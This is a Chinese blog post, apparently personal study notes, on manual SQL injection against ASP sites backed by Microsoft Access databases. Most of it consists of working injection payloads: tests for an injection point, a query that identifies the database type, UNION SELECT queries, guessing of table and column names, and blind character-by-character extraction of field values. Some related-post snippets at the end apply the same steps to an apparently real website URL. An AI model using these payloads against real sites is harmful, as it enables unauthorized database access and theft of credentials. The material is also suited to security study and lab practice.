access手工注入

最新推荐文章于 2024-08-20 15:41:54 发布
最新推荐文章于 2024-08-20 15:41:54 发布
阅读量5.9k 收藏 10
点赞数 7
分类专栏: # WEB安全 文章标签: access 手工注入 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014029795/article/details/91071005
版权

写下来,加深印象,方便后期整理。

判断注入点

可以使用如下方法来判断:

  • 特殊符号,\、/、'、"等。
  • -0 减数字看是否变化。
  • 逻辑关系,and比较常用,这里讲讲or和xor,or、xor和and都是相反的,如果错误的就会回显正常,如果是正确的就会回显不正常。xor肯定是不同为真,相同为假,这个好理解,但是数据库里面or的逻辑关系到是有点奇怪了,同时为真时回显会不正常。

判断数据库类型

asp一般搭载access或者mssql,首先得判断出来是哪一类数据库。

and exists (select * from msysobjects)>0

正常回显即为access数据库,如果报错可看报错信息来判断是否在access数据库。

下面这个为sqlserver的判断语句and exists (select * from sysobjects)>0

猜表名和列名

判断表名和列名有两种常用方法,联合查询猜解表名

  • 联合查询真的是只能靠猜和工具,完全凭经验。。。先用order by判断列的长度,然后联合查询表,回显正常即为表存在,反之为不存在。然后再接着猜列名。这里有个地方没搞出来,假设如果admin字段有两个内容,那怎么去查询出第二个内容呢?我这里通过查看db找到了这样的一张表,同一个字段有多个记录,但是查询完只会出现一个记录。也没有找到像mysql中可以使用limit或者gourp_concat之类的方法来搞定这个问题。不过这里想到一个骚操作,一般放用户名的地方可能会存放着user_id或者id这类的字段,如果真的需要猜的话,可以使用这个来完成精确查询。联合查询还是最后等猜解出准确的字段名时再使用时比较好。
    这里想到办法解决如何去查第二个字段的方法了。
    UNION SELECT 1,2,id,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from (select top 1 id from news order by id desc )
    这个问题能够解决的话,联合查询似乎更加简单快速。
  • 猜解表名。利用exists函数来完成猜解,判断方法和之前一样,存在则为正常显示,反之报错显示。
    and exists (select * from 表名)
    表名还可以使用这种方法来猜表名,and 0<>(select count(*) from 表名)
    列名也只能靠猜,如果猜不到就只能使用偏移注入来碰运气了,偏移注入下篇blog再写。
    and exists (select admin from admin)

爆字段内容

爆字段内容要分两步,先猜长度,再猜内容

  • 猜长度。and (select len(admin) from admin)=5,如果正确则回显正常。
  • 猜内容,一个一个字段的猜,和盲注一样的道理。and (select asc(mid(admin,1,1)) from admin)>95,asc()仍然还是转换为ascii码的函数,mid(admin,1,1)则为截取admin字段内容的第一个字符的一个字符,也就为第一个字符。
  • 但是这样的猜只能猜出一个记录的内容,如果希望爆出更多内容,那么就得优化一下语句了,首先,来判断一下某表的列长度。and (select count(*) from news)=10,当然还可以使用between and来完成判断长度。
    效果是一样的,当然最后结果也确实是只有10个字段。
  • 接着来看第二个字段的长度,长度为3。
    and (select top 1 len(id) from (select top 2 id from news ) order by id desc)=3
  • 然后来猜第二个字段的第一个字符了,字符的ascii编码为49即为1。
    and (select top 1 asc(mid(id,1,1)) from (select top 2 id from news ) order by id desc)=49
    接着来猜第二个字段的第二个字符,字符的ascii编码为57即为9。
    and (select top 1 asc(mid(id,2,1)) from (select top 2 id from news ) order by id desc)=57
    接着来猜第二个字段的第三个字符,字符的ascii编码为50即为2。
    and (select top 1 asc(mid(id,3,1)) from (select top 2 id from news ) order by id desc)=50
    所以第二字段的值为192,和上图中显示一样,其余的字段值也可以这样显示出来。

总结

由于access的系统表不像mysql一样具有系统索引库,所以表名和列名都只能靠猜。。。如果通过社工、工具、经验(比如看后台源码的表单名字)都搞不出来的话,就只能通过偏移来试试运气了,令人不太爽,渣渣access。

baynk
关注
专栏目录
access手工注入-联合查询法
weiliang369的博客
02-19 1374
&注入的作用 1.注入得到管理员账号 密码 2.脱库 &access注入语句 and 1=1是判断是否存在注入的 返回正常 返回不正常 这是存在注入的 猜字段 猜字段数order by 字段数值 一般情况下我们都从1开始 order by 1 order by 20 order by 10 order by 最终字段数值 我们这样为了减少时间能更快的得到字段数 到23就显示错误了 说明 字段是22 存在22个字段 最终得到的字段...
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 978
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
Access手工注入
Unknowncheats的博客
09-14 455
access手工注入 哈哈哈哈,,,我顾北清又回来啦,接着更新。 实验环境:win2008R2虚拟机,物理机(也就是我的win10)。 搭建环境用的是access+asp源码。 环境搭建可以参照这里,不同的是在第六步勾选应用程序开发选项。 环境搞完之后大概是这个样子的: 接着来手工注入一下。 首先判断有没有注入点,随便点进一个页面:%20是空格的转码。and 1=1没有出错,再来试试and 1=2。 出错了,说明它将这条语句带入查询了,说明存在注入点。 1.联合查询法 先判断字段长度,使用orde...
Access手工注入-【附环境搭建教程】
最新发布
qq_65852138的博客
08-20 2110
Access手工注入-【附环境搭建教程】
手工ACCESS注入方法
ming2008tian的博客
11-23 482
百度搜索inurl asp id会出现一大堆相关网站,以目标http://www.cnsgroup.cn/about.asp?id=61为例: 1、在url后添加and 1=1测试是否有注入点 2、然后在后面添加order by 10,访问http://www.cnsgroup.cn/about.asp?id=61 order by 10看能否正常访问,如能正常访问则表示数据库有10个字段,
ASP+acc手工注入
rjgcwl的专栏
01-14 629
ASP+acc手工注入 SQL注入这么长时间,看见有的朋友还是不会手工注入,那么我来演示一下。高手略过。我们大家知道,一般注入产生在没经过虑的变量上,像ID?=XX这样的。下面以这个网址为例:http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=1 返回了正常http://zs
Access注入
zhuangsle的博客
08-25 721
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
Access数据库手工注入
IerkeU的博客
11-28 1830
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。 access数据库结构? access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。 access注入基本流程? 判断有没有注入点 猜解表名 猜解字段 猜解管理员ID值 猜解用户名和密码长度 猜解用户名和密码 ASP的
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
SQL手工注入access手工注入
The__DeepSea的博客
05-13 562
一、判断是否存在注入‘       页面返回错误,可能存在注入and 1=1  页面返回正确    and1=2 页面返回错误  可能存在注入二、判断数据库类型1.and (select count(*) from mysysobjects)&gt;0  -返回权限不足 为access数据库2.and (select count(*) from sysobjects)&gt;0  -但会正常为MS...
ASP+ACCESSSQL注入网站源码
05-20
ASP+ACCESSSQL注入网站源码,完美适合网络安全初学者的SQL注入案例
asp+access注入网站源码
02-19
个人博客:实战初级SQL注入-access篇,所涉及的网站源码,如有侵权冒犯,请联系我。
Access数据库手工注入全攻略——小白必看
07-18
通过网上资料加大神指导,写出来的关与asp手工注入的攻略。
SQL注入之——ACCESS手工注入
温柔小薛的博客
04-04 890
ACCESS手工注入 目录ACCESS手工注入ACCESS手工注入(上)理论基础爆出数据库类型(需要低版本IE浏览器)猜数据库名猜字段名及字段长度猜字段值ACCESS手工注入(下)SQL 注入中的高级查询——order by 与 union selectunion select 查询攻击测试ACCESS手工偏移注入ACCESS手工跨库查询 ACCESS手工注入(上) Access数据库一般用于流量...
SQL手工注入漏洞测试(Access数据库)
天天学安全专属博客
11-10 812
SQL手工注入漏洞测试(Access数据库)和Access数据库注入
ACCESS注入
qq_57307348的博客
02-13 2552
目录 access数据库结构 access数据库类型判断 access数据库需要掌握的几个函数 access注入基本流程 access查询方法 联合查询 布尔型盲注 access数据库结构 表名---->列名---->内容数据 不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有若干张表。 access数据库类型判断 根据url文件后缀初步判断,一般asp和access数据库连用,通过and (select count(*) from msys
SQL注入原理-手工注入access数据库
WQ_762的博客
08-06 648
SQL注入原理-手工注入access数据库 【实验原理】 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 首先,在以【.asp?id=32(数字任意)】结尾的链接依次添加语句【’】、【and 1=1】和【and1=2】,来判断网站是否存在注入点。 然后,添加语句【and exists(select * fr...
Access数据库手工注入攻防实战教程
"E103-数据库安全-手工注入access数据库" 本文主要讲解了数据库安全的一个常见问题——手工注入Access数据库。Access数据库是Microsoft Office套件中的一款轻量级数据库管理系统,常用于小型企业或个人数据管理。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值